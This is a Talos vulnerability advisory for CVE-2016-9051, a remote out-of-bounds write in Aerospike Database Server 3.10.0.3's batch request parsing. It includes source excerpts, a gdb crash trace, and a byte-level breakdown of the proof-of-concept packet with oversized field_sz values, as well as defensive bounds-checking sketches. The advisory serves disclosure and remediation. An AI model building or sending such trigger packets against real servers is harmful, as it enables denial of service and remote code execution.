Talos Vulnerability Report

TALOS-2016-0265

Aerospike Database Server Client Batch Request Code Execution Vulnerability

February 21, 2017
CVE Number

CVE-2016-9051

Summary

An exploitable out-of-bounds write vulnerability exists in the batch transaction field parsing functionality of Aerospike Database Server 3.10.0.3. A specially crafted packet can cause an out-of-bounds write resulting in memory corruption which can lead to remote code execution. An attacker can simply connect to the port to trigger this vulnerability.

Tested Versions

Aerospike Database Server 3.10.0.3

Product URLs

https://github.com/aerospike/aerospike-server/tree/3.10.0.3

CVSSv3 Score

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-823 - Use of Out-of-range Pointer Offset

Details

Aerospike Database Server is a distributed, scalable NoSQL database used as a back end for web applications that need a key-value store. With a focus on performance, it is multi-threaded and keeps its indexes entirely in RAM, with the ability to persist data to a solid-state drive or traditional rotational media.

To handle packets received from a client, the server spawns multiple threads, each of which executes the thr_demarshal function. When a socket is ready to be read, the server receives data from the socket and determines the packet’s message type. If its protocol type specifies that the packet is compressed (PROTO_TYPE_AS_MSG_COMPRESSED), the server decompresses the contents of the packet with zlib [1] and then continues to process the packet as type PROTO_TYPE_AS_MSG. When processing a packet of type PROTO_TYPE_AS_MSG, the server checks some flags within the header and uses them to determine what type of request is being made. If one of these flags specifies the AS_MSG_INFO1_BATCH option, the server passes the packet to the as_batch_queue_task function [2].

as/src/base/thr_demarshal.c:389
void *
thr_demarshal(void *unused)
{
...
    // Demarshal transactions from the socket.
...
        // Iterate over all events.
        for (i = 0; i < nevents; i++) {
...
                // If pointer is NULL, then we need to create a transaction and
                // store it in the buffer.
                if (fd_h->proto == NULL) {
...
                    // Do a preliminary read of the header into a stack-
                    // allocated structure, so that later on we can allocate the
                    // entire message buffer.
                    if (0 >= (n = cf_socket_recv(sock, &proto, sizeof(as_proto), MSG_WAITALL))) {
                        cf_detail(AS_DEMARSHAL, "proto socket: read header fail: error: rv %d sz was %d errno %d", n, sz, errno);
                        goto NextEvent_FD_Cleanup;
                    }
...
                // Check for a finished read.
                if (0 == fd_h->proto_unread) {
...
                    // Check if it's compressed.
                    if (tr.msgp->proto.type == PROTO_TYPE_AS_MSG_COMPRESSED) {  // [1]
...
                    }
...
				// Fast path for batch requests.
				if (tr.msgp->msg.info1 & AS_MSG_INFO1_BATCH) {
					as_batch_queue_task(&tr);                                   // [2]
					goto NextEvent;
				}

Inside the as_batch_queue_task function, the server first parses the header [1] and then iterates through all the fields defined in the packet, looking for fields of type AS_MSG_FIELD_TYPE_BATCH or AS_MSG_FIELD_TYPE_BATCH_WITH_SET. If a field of either type is found, the function saves it to the bf variable [2]. The server then processes that field by reading a uint32_t [3], which is used as the number of records to read from the packet, followed by a byte [4] that determines whether the transaction described in the packet is processed in-line or not. The server then enters a loop to read each record out of the packet.

as/src/base/batch.c:636
int
as_batch_queue_task(as_transaction* btr)
{
...
    // Parse header
    as_msg* bmsg = &btr->msgp->msg;
    as_msg_swap_header(bmsg);                                   // [1]
...
    // Parse fields
    uint8_t* limit = (uint8_t*)bmsg + bproto->sz;
    as_msg_field* mf = (as_msg_field*)bmsg->data;
    as_msg_field* end;
    as_msg_field* bf = 0;
...
    for (int i = 0; i < bmsg->n_fields; i++) {
...
        as_msg_swap_field(mf);
        end = as_msg_field_get_next(mf);

        if (mf->type == AS_MSG_FIELD_TYPE_BATCH || mf->type == AS_MSG_FIELD_TYPE_BATCH_WITH_SET) {
            bf = mf;                                            // [2]
        }
        mf = end;
    }
...
    // Parse batch field
    uint8_t* data = bf->data;
    uint32_t tran_count = cf_swap_from_be32(*(uint32_t*)data);  // [3]
    data += sizeof(uint32_t);
...
    uint32_t tran_row = 0;
    uint8_t info = *data++;  // allow transaction inline.       // [4]
...
    while (tran_row < tran_count && data + BATCH_REPEAT_SIZE <= limit) {
        // Copy transaction data before memory gets overwritten.
        in = (as_batch_input*)data;
        tr.from_data.batch_index = cf_swap_from_be32(in->index);
        memcpy(&tr.keyd, &in->keyd, sizeof(cf_digest));
...

Inside the loop, the server checks whether the repeat boolean is set. If it is not, the server creates a cl_msg structure in order to satisfy the batch request made by the client [1]. If the repeat boolean is set, the previous message is reused to complete the transaction [2]. Note that if the first transaction is set to repeat, an uninitialized transaction will be queued to the server, which can cause a denial-of-service condition. After determining that a transaction should be read from the packet, the server reads two uint16_t values to determine the number of fields (n_fields) and number of operations (n_ops) [3] that need to be read.

as/src/base/batch.c:781
    while (tran_row < tran_count && data + BATCH_REPEAT_SIZE <= limit) {
        // Copy transaction data before memory gets overwritten.
        in = (as_batch_input*)data;
        tr.from_data.batch_index = cf_swap_from_be32(in->index);
        memcpy(&tr.keyd, &in->keyd, sizeof(cf_digest));
...
        if (in->repeat) {                                           // [2]
            // Row should use previous namespace and bin names.
            data += BATCH_REPEAT_SIZE;
        }
        else {
            // Row contains full namespace/bin names.
            out = (cl_msg*)data;                                    // [1]

            if (data + sizeof(cl_msg) + sizeof(as_msg_field) > limit) {
                break;
            }
...
            // n_fields/n_ops is in exact same place on both input/output, but the value still
            // needs to be swapped.
            out->msg.n_fields = cf_swap_from_be16(in->n_fields);    // [3]

            // Older clients sent zero, but always sent namespace.  Adjust this.
            if (out->msg.n_fields == 0) {
                out->msg.n_fields = 1;
            }

            out->msg.n_ops = cf_swap_from_be16(in->n_ops);          // [3]
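
The repeat handling described above implies a precondition: a row may only repeat if an earlier row supplied a full message. The following is a minimal sketch of that validation, not Aerospike code; validate_repeat_flags is a hypothetical helper that takes the repeat byte of each row in packet order.

```python
def validate_repeat_flags(repeat_flags):
    """Raise ValueError if a row repeats before any full row was seen.

    repeat_flags is a sequence holding the repeat byte of each batch row,
    in the order the rows appear in the packet (hypothetical input format).
    """
    have_previous = False
    for row, repeat in enumerate(repeat_flags):
        if repeat:
            # A repeat row reuses the previous message, so one must exist.
            if not have_previous:
                raise ValueError(
                    f"row {row} repeats but no previous message exists"
                )
        else:
            # A full row supplies the message that later rows may reuse.
            have_previous = True
```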

After reading the number of fields and the number of operations, the server iterates through the packet, setting a flag if a field is of type AS_MSG_FIELD_TYPE_SET and calling as_msg_swap_field [1] for each field. To seek to the next field within the packet, the server calls as_msg_field_get_next [2]. This function simply reads a uint32_t out of the packet as a size and adds it to the pointer provided as the argument. Because the loop has no bounds check, this call can move the mf variable outside the bounds of the packet, at which point the as_msg_swap_field call in the next iteration flips the byte order of the size field at that out-of-bounds location. This can cause memory corruption, which can lead to code execution in the context of the server. By contrast, when processing the transaction operations that follow, the server correctly checks whether any seek moves the op variable out of bounds [3]. This check is made both for the as_msg_op structure itself and when using the size defined within it to seek to the next operation.

as/src/base/batch.c:827
            mf = as_msg_field_get_next(mf);

            // Swap remaining fields.
            for (uint16_t j = 1; j < out->msg.n_fields; j++) {
                if (mf->type == AS_MSG_FIELD_TYPE_SET) {
                    as_transaction_set_msg_field_flag(&tr, AS_MSG_FIELD_TYPE_SET);
                }

                as_msg_swap_field(mf);                      // [1]
                mf = as_msg_field_get_next(mf);             // [2]
            }

            data = (uint8_t*)mf;
...
            if (out->msg.n_ops) {
                // Bin names input is same as transaction ops, so just leave in place and swap.
                uint16_t n_ops = out->msg.n_ops;
                for (uint16_t j = 0; j < n_ops; j++) {
                    if (data + sizeof(as_msg_op) > limit) { // [3]
                        goto TranEnd;
                    }
                    op = (as_msg_op*)data;
                    as_msg_swap_op(op);
                    op = as_msg_op_get_next(op);
                    data = (uint8_t*)op;

                    if (data > limit) {                     // [3]
                        goto TranEnd;
                    }
                }
            }
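
The missing check can be illustrated with a short sketch. The Python below is not Aerospike code and is not the vendor's fix; it models a field as a 4-byte big-endian field_sz followed by field_sz bytes (type plus data), and walk_fields is a hypothetical helper that refuses to advance past the end of the buffer, in the same spirit as the checks at [3].

```python
import struct

FIELD_SZ_LEN = 4  # width of the big-endian field_sz prefix


def walk_fields(buf: bytes, offset: int, n_fields: int) -> int:
    """Return the offset just past n_fields fields, or raise ValueError.

    Each field is modeled as a uint32 field_sz (big-endian) followed by
    field_sz bytes that hold the type byte and the data.
    """
    limit = len(buf)
    for _ in range(n_fields):
        # The size prefix itself must lie inside the buffer.
        if offset + FIELD_SZ_LEN > limit:
            raise ValueError("field header exceeds packet bounds")
        (field_sz,) = struct.unpack_from(">I", buf, offset)
        next_offset = offset + FIELD_SZ_LEN + field_sz
        # The seek to the next field must also stay inside the buffer.
        if next_offset > limit:
            raise ValueError("field_sz seeks past packet bounds")
        offset = next_offset
    return offset
```

With a check of this kind, a field whose field_sz is 0xffffffff is rejected before the pointer is advanced, rather than being dereferenced on the next iteration.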

Crash Information

# gdb -q -p `systemctl status aerospike.service | grep 'Main PID' | cut -d: -f2- | cut -d' ' -f2`

...
(gdb) c
Continuing.
[Switching to Thread 0x7f7463fff700 (LWP 13293)]

Catchpoint 4 (signal SIGSEGV), 0x00000000004b8527 in as_batch_queue_task (
    btr=0x7f7463ffb930) at base/batch.c:831
831                                     if (mf->type == AS_MSG_FIELD_TYPE_SET) {

(gdb) x/i $pc
=> 0x4b8527 <as_batch_queue_task+2823>: movzbl 0x4(%rax),%ecx

(gdb) i r $rax
rax            0x7f75580c410e   0x7f75580c410e

(gdb) db data L0x10
7f74580c410b | ff ff ff ff 01 ff ff ff ff 01 00 00 00 00 00 00 | ................

(gdb) p *(as_msg_field*)data
$7 = {field_sz = 0xffffffff, type = 0x1, data = 0x7f74580c4110 "\377\377\377\377\001"}

(gdb) p data + ((as_msg_field*)data)->field_sz + sizeof(((as_msg_field*)0)->field_sz)
$26 = (uint8_t *) 0x7f75580c410e <Address 0x7f75580c410e out of bounds>
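
The faulting address follows directly from the values in the debugger output. As a quick check of the arithmetic (the variable names here are illustrative only), adding the attacker-controlled field_sz and the 4-byte size prefix to the field's address yields the value held in rax:

```python
MASK64 = (1 << 64) - 1     # pointers are 64 bits wide on this target

data = 0x7F74580C410B      # address of the field, from the `db data` output
field_sz = 0xFFFFFFFF      # size read from the packet
SIZEOF_FIELD_SZ = 4        # sizeof(uint32_t)

# Same expression as the final gdb command in the session above.
next_field = (data + field_sz + SIZEOF_FIELD_SZ) & MASK64

print(hex(next_field))     # address the server dereferences next
print(next_field - data)   # distance seeked, roughly 4 GiB past the field
```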

Exploit Proof-of-Concept

To execute the proof-of-concept (note: this is only provided to the vendor), simply extract and run it as follows:

$ python poc hostname:3000
Trying to connect to hostname:3000
Sending 0x73 byte packet... done.

A client packet for Aerospike server has the following structure. The first 2 bytes describe the protocol version and the protocol type. The version must be 0x02, while the protocol type can be one of two values. If AS_COMPRESSED_MSG(0x04) is specified, the contents of data are zlib-encoded; otherwise, the AS_MSG(0x03) value is used. The size of this data is defined by the sz field, which is a 48-bit unsigned integer.

<class aspie.as_proto_s>
[0] <instance aspie.proto_version 'version'> v2(0x2)
[1] <instance aspie.proto_type 'type'> AS_MSG(0x3)
[2] <instance uint48_t 'sz'> +0x00000000006b (107)
[8] <instance aspie.as_msg_s 'data'> "\x00\x08\x00\x00\x00\x00\x00  ..skipped ~87 bytes.. \x00\x00\x00\x00\x00\x00\x00"
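
As a rough illustration of this layout, the 8-byte header can be decoded as follows. This is a sketch, not the server's parser: parse_proto is a hypothetical helper, and it assumes sz is stored big-endian, which is consistent with the other multi-byte fields in the dumps.

```python
def parse_proto(header: bytes):
    """Split an 8-byte protocol header into (version, type, sz)."""
    if len(header) != 8:
        raise ValueError("protocol header must be exactly 8 bytes")
    version = header[0]
    proto_type = header[1]
    # sz is a 48-bit unsigned integer; big-endian order is an assumption.
    sz = int.from_bytes(header[2:8], "big")
    return version, proto_type, sz


# Header values taken from the dump above: v2, AS_MSG(0x3), sz = 0x6b.
sample = bytes([0x02, 0x03]) + (0x6B).to_bytes(6, "big")
version, proto_type, sz = parse_proto(sample)
total_len = len(sample) + sz  # header plus payload
```

The header plus a 0x6b-byte payload gives 0x73 bytes in total, which matches the packet length reported by the proof-of-concept.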

The contents of the data field have the following structure. In order to submit a batch message, a flag needs to be specified in the info1 field. When the fourth bit is set (0x08), the packet represents a batched transaction that is intended to be queued. After this flag is set, the number of protocol fields is specified in n_fields.

<class aspie.as_msg_s> 'data'
[8] <instance uint8_t 'header_sz'> +0x00 (0)
[9] <instance aspie.AS_MSG_INFO1 'info1'> {bits=8} (0x08, 8) BATCH
[a] <instance aspie.AS_MSG_INFO2 'info2'> {bits=8} (0x00, 8)
[b] <instance aspie.AS_MSG_INFO3 'info3'> {bits=8} (0x00, 8)
[c] <instance uint8_t 'unused'> +0x00 (0)
[d] <instance uint8_t 'result_code'> +0x00 (0)
[e] <instance uint32_t 'generation'> +0x00000000 (0)
[12] <instance uint32_t 'record_ttl'> +0x00000000 (0)
[16] <instance uint32_t 'transaction_ttl'> +0x00000000 (0)
[1a] <instance uint16_t 'n_fields'> +0x0002 (2)
[1c] <instance uint16_t 'n_ops'> +0x0000 (0)
[1e] <instance array(aspie.as_msg_field_s,2) 'fields'> aspie.as_msg_field_s[2] "\x00\x00\x00\x01\x00\x00\x00  ..skipped ~65 bytes.. \x00\x00\x00\x00\x00\x00\x00"
[73] <instance array(aspie.as_msg_op_s,0) 'ops'> aspie.as_msg_op_s[0] ""
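
The fixed part of this structure spans offsets 0x08 through 0x1d, or 22 bytes. A minimal sketch of decoding it with Python's struct module is shown below; the field names follow the dump, while parse_as_msg_header and is_batch are hypothetical helpers and big-endian byte order is assumed.

```python
import struct

# header_sz, info1, info2, info3, unused, result_code (1 byte each),
# generation, record_ttl, transaction_ttl (4 bytes each),
# n_fields, n_ops (2 bytes each): 22 bytes, big-endian assumed.
AS_MSG_HEADER = struct.Struct(">BBBBBBIIIHH")
AS_MSG_INFO1_BATCH = 0x08  # fourth bit of info1

FIELD_NAMES = (
    "header_sz", "info1", "info2", "info3", "unused", "result_code",
    "generation", "record_ttl", "transaction_ttl", "n_fields", "n_ops",
)


def parse_as_msg_header(data: bytes) -> dict:
    """Decode the fixed 22-byte message header into a dict."""
    return dict(zip(FIELD_NAMES, AS_MSG_HEADER.unpack_from(data, 0)))


def is_batch(header: dict) -> bool:
    """True when the BATCH bit is set in info1."""
    return bool(header["info1"] & AS_MSG_INFO1_BATCH)


# Values from the dump above: info1 = 0x08, n_fields = 2, n_ops = 0.
sample = bytes([0, 0x08, 0, 0, 0, 0]) + bytes(12) + struct.pack(">HH", 2, 0)
header = parse_as_msg_header(sample)
```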

The provided proof-of-concept sends a packet with two fields encoded within. Each field begins with a 32-bit size. This size includes the byte that represents the type as well as the contents of the data field. The two field types that are required are the NAMESPACE(0x0) type and the BATCH(0x29) type. The NAMESPACE(0x0) type simply contains, within its data field, an ASCII-encoded string describing the namespace to query.

<class aspie.as_msg_field_s> '0'
[1e] <instance uint32_t 'field_sz'> +0xXXXXXXXX (X)
[22] <instance aspie.AS_MSG_FIELD_TYPE 'type'> NAMESPACE(0x0)
[23] <instance aspie.as_msg_namespace_s<char_t> 'data'> ...

<class aspie.as_msg_field_s> '1'
[23] <instance uint32_t 'field_sz'> +0x0000004c (76)
[27] <instance aspie.AS_MSG_FIELD_TYPE 'type'> BATCH(0x29)
[28] <instance aspie.as_msg_batch_s 'data'> "\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\xff\xff\xff\xff\x01\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

The BATCH(0x29) field has the following structure. The tran_count variable describes the number of transactions that are within. The provided proof-of-concept includes two transactions, of which only one is required. The info byte that follows describes whether the transaction should be executed in-line or queued for later, and it does not affect the triggering of this vulnerability.

<class aspie.as_msg_batch_s> 'data'
[28] <instance uint32_t 'tran_count'> +0x00000002 (2)
[2c] <instance uint8_t 'info'> +0x00 (0)
[2d] <instance aspie.as_batch_input 'transactions'> aspie.transaction[2] "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\xff\xff\xff\xff\x01\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

Each transaction begins with a 25-byte header. The last byte of this header indicates which type of transaction record is described. If it is set to 0x01, a repeat record is used; otherwise, an actual ‘as_msg_s’ structure is embedded within the packet. The vulnerability described in this advisory revolves around the fields within an embedded ‘as_msg_s’ structure, so the 25th byte of the header must be 0x00. The first batch transaction and its header are as follows.

<class aspie.transaction> '0'
[2d] <instance aspie._header 'header'> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
[46] <instance aspie.as_batch_msg 'msg'> "\x00\x00\x02\x00\x00\xff\xff\xff\xff\x01\xff\xff\xff\xff\x01"

<class aspie.as_batch_repeat> 'rpt'
[0] <instance uint32_t 'index'> +0x00000000 (0)
[4] <instance aspie.cf_digest 'keyd'> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
[18] <instance uint8_t 'repeat'> +0x00 (0)
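
The 25-byte header can be decoded in the same way. The sketch below assumes the layout shown in the dump (a 4-byte big-endian index, a 20-byte digest, and a 1-byte repeat flag); parse_row_header is a hypothetical helper, not a function from the Aerospike source.

```python
import struct

# index (uint32), keyd (20-byte digest), repeat (uint8): 25 bytes total.
BATCH_ROW_HEADER = struct.Struct(">I20sB")


def parse_row_header(buf: bytes, offset: int = 0):
    """Return (index, keyd, repeat) for the row header at offset."""
    index, keyd, repeat = BATCH_ROW_HEADER.unpack_from(buf, offset)
    return index, keyd, bool(repeat)


# An all-zero header, as in the dump above: index 0, empty digest,
# repeat unset, so a full message follows the header.
index, keyd, repeat = parse_row_header(bytes(25))
```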

Due to the repeat byte in the header being 0x00, the structure at offset 0x2d of the packet contains an as_msg_s type. When processing this type encoded within a BATCH(0x29) field, the transaction header is encoded as a truncated as_msg_s type and has the following format. The contents of proto and trunc(msg) are mostly ignored by Aerospike Server.

<class aspie.as_batch_msgtrunc> 'msg'
[0] <instance aspie.as_batch_proto_s 'proto'> "\x00\x00\x00\x00\x00\x00\x00\x00"
[8] <instance aspie.as_batch_msg_s 'trunc(msg)'> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

<class aspie.as_batch_proto_s> 'proto'
[0] <instance aspie.proto_version 'version'> v0(0x0)
[1] <instance aspie.proto_type 'type'> +0x00 (0)
[2] <instance uint48_t 'sz'> +0x000000000000 (0)

<class aspie.as_batch_msg_s> 'trunc(msg)'
[8] <instance uint8_t 'header_sz'> +0x00 (0)
[9] <instance aspie.AS_MSG_INFO1 'info1'> {bits=8} (0x00, 8)
[a] <instance aspie.AS_MSG_INFO2 'info2'> {bits=8} (0x00, 8)
[b] <instance aspie.AS_MSG_INFO3 'info3'> {bits=8} (0x00, 8)
[c] <instance uint8_t 'unused'> +0x00 (0)
[d] <instance uint8_t 'result_code'> +0x00 (0)
[e] <instance uint32_t 'generation'> +0x00000000 (0)
[12] <instance uint32_t 'record_ttl'> +0x00000000 (0)
[16] <instance uint_t 'trunc(transaction_ttl)'> +0x0000 (0)
[18] <instance uint8_t 'repeat'> +0x00 (0)

At offset 0x46 of the packet produced by the proof-of-concept is the truncated data of the as_msg_s structure. This structure begins with the info1 byte and is followed by two values, n_fields and n_ops, which describe the number of fields and operations that follow. Due to an assumption made by the server, there must be at least two fields within this structure to reach this vulnerability.

<class aspie.as_batch_msg> 'msg'
[46] <instance aspie.AS_MSG_INFO1 'info1'> {bits=8} (0x00, 8)
[47] <instance uint16_t 'n_fields'> +0x0002 (2)
[49] <instance uint16_t 'n_ops'> +0x0000 (0)
[4b] <instance dynamic.array(aspie.as_msg_field_s,2) 'fields'> aspie.as_msg_field_s[2] "\xff\xff\xff\xff\x01\xff\xff\xff\xff\x01"
[55] <instance dynamic.array(aspie.as_msg_op_s,0) 'ops'> aspie.as_msg_op_s[0] ""

Although both fields in msg are of type SET(0x1), the type field does not affect the vulnerability. The vulnerability exists because the application does not check whether the field_sz of each field in msg will seek the pointer outside the bounds of the packet data. If the aggregate sum of the field_sz values across the msg fields is larger than the bounds of the packet (which can be determined from the uint48_t sz at offset 2 of the packet), the vulnerability is triggered. The provided proof-of-concept sets both of these lengths to the largest possible uint32_t.

<class aspie.as_msg_field_s> '0'
[4b] <instance uint32_t 'field_sz'> +0xffffffff (4294967295)
[4f] <instance aspie.AS_MSG_FIELD_TYPE 'type'> SET(0x1)
[50] <instance aspie.as_msg_namespace_s<char_t> 'data'> u''

<class aspie.as_msg_field_s> '1'
[50] <instance uint32_t 'field_sz'> +0xffffffff (4294967295)
[54] <instance aspie.AS_MSG_FIELD_TYPE 'type'> SET(0x1)
[55] <instance aspie.as_msg_namespace_s<char_t> 'data'> u''

Timeline

2016-12-23 - Vendor Disclosure
2017-02-21 - Public Release

Credit

Discovered by the Cisco Talos Team